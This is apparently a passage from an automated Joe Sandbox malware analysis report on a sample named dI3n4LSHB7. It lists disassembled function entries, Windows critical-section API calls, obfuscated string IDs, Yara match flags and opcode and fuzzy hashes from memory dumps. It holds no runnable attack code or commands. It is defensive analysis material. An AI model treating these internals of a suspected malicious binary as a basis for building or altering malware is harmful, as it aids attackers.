                                                                                  • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                                                  • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                                                • __Init_thread_footer.LIBCMT ref: 00407D2E
                                                                                  • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                                                  • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                                                  • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                                • String ID: CD^O$_DC[
                                                                                • API String ID: 2296764815-3597986494
                                                                                • Opcode ID: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
                                                                                • Instruction ID: 8bf2ad3165393ed28199ca71651b1e02a490a28405ec2f0c6d2e7b73ba48d91c
                                                                                • Opcode Fuzzy Hash: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
                                                                                • Instruction Fuzzy Hash: 1C012630F002059BC720EF6AAD0196973B4FB59300B84017AE5146B282E77899428BDE
                                                                                APIs
                                                                                  • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                                                  • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                                                • __Init_thread_footer.LIBCMT ref: 0040776E
                                                                                  • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                                                  • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                                                  • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                                • String ID: CD^O$_DC[
                                                                                • API String ID: 2296764815-3597986494
                                                                                • Opcode ID: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
                                                                                • Instruction ID: 44c7e97e152ec1ca5567fde67ff81d8d8e81e117548a1af78ec12ab7f1e6b2a3
                                                                                • Opcode Fuzzy Hash: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
                                                                                • Instruction Fuzzy Hash: 64012670F002089BC720FF69AD41A5973B0E708350F80827EE5196B292EB786941CBCA
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 04CF6519
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: DCDO$EDO*
                                                                                • API String ID: 1385522511-3480089779
                                                                                • Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                                                • Instruction ID: ca1d45f45f879eefd52c6732b31f4e1b4ccb8f88810e0ba0a058895270f261f9
                                                                                • Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                                                • Instruction Fuzzy Hash: 2501D6B0B012089FDB60EFA4EC8155CB7B1E705304F904579CB0597350DB387A858B99
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 04CF6629
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: DCDO$^]E*
                                                                                • API String ID: 1385522511-2708296792
                                                                                • Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                                                • Instruction ID: f44df31befee56a4becd036a8d8fa0c0979a67861187bd214ef651ff3220b3c4
                                                                                • Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                                                • Instruction Fuzzy Hash: 5E018170F00208AFDB60FFA8ED4256CBBB1EB04304F94417ADA1997394DF397A159B99
                                                                                APIs
                                                                                  • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                                                                  • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                                                                • __Init_thread_footer.LIBCMT ref: 04B47490
                                                                                  • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                                                                  • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                                                • String ID: DCDO$^]E*
                                                                                • API String ID: 4132704954-2708296792
                                                                                • Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                                                • Instruction ID: 6f4b96e39770c75f6dbf9a5ad1d2e765e7569c03ea8a6f485ed5ebe238ee9a96
                                                                                • Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                                                • Instruction Fuzzy Hash: 2A01ADB0B00208ABCB20EF68E98256DBBB0EB44314F8401BAC91957390CB35B9109F89
                                                                                APIs
                                                                                  • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                                                                  • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                                                                • __Init_thread_footer.LIBCMT ref: 04B47380
                                                                                  • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                                                                  • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                                                • String ID: DCDO$EDO*
                                                                                • API String ID: 4132704954-3480089779
                                                                                • Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                                                • Instruction ID: f8e536f69ee61ca72cfba216928ad109341b111eb874ba451fd152c23f1c1cb4
                                                                                • Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                                                • Instruction Fuzzy Hash: 0F01D6F0B013089FDB10DF64E98159DB7B0EB85304F9041F9CA15573A0CB347981DB89
                                                                                APIs
                                                                                  • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                                                  • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                                                • __Init_thread_footer.LIBCMT ref: 00407119
                                                                                  • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                                                  • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                                                  • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                                • String ID: DCDO$EDO*
                                                                                • API String ID: 2296764815-3480089779
                                                                                • Opcode ID: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
                                                                                • Instruction ID: 6e88f7cd3849569d85f07cd18ee47690fbb1a730dcdea08f10a2250dba35ba50
                                                                                • Opcode Fuzzy Hash: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
                                                                                • Instruction Fuzzy Hash: 1F0186B0F01208AFC710DF55E98255DB7B0E705304F90457ADA15AB3D1DB386D95CB8D
                                                                                APIs
                                                                                  • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                                                  • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                                                • __Init_thread_footer.LIBCMT ref: 00407229
                                                                                  • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                                                  • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                                                  • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                                • String ID: DCDO$^]E*
                                                                                • API String ID: 2296764815-2708296792
                                                                                • Opcode ID: da9be0c5e5273d7ee2d012b34ad58f6f2e7d462380927887947c71f03af37cc5
                                                                                • Instruction ID: 8efc7060af64cb8acb1af25de2c4b339d239c6825e953d18f5e204f1a235d67b
                                                                                • Opcode Fuzzy Hash: da9be0c5e5273d7ee2d012b34ad58f6f2e7d462380927887947c71f03af37cc5
                                                                                • Instruction Fuzzy Hash: 8F016D70F002089BC720EF68E94295DB7B0EB08304F9441BEE919A7396DB3969158BCE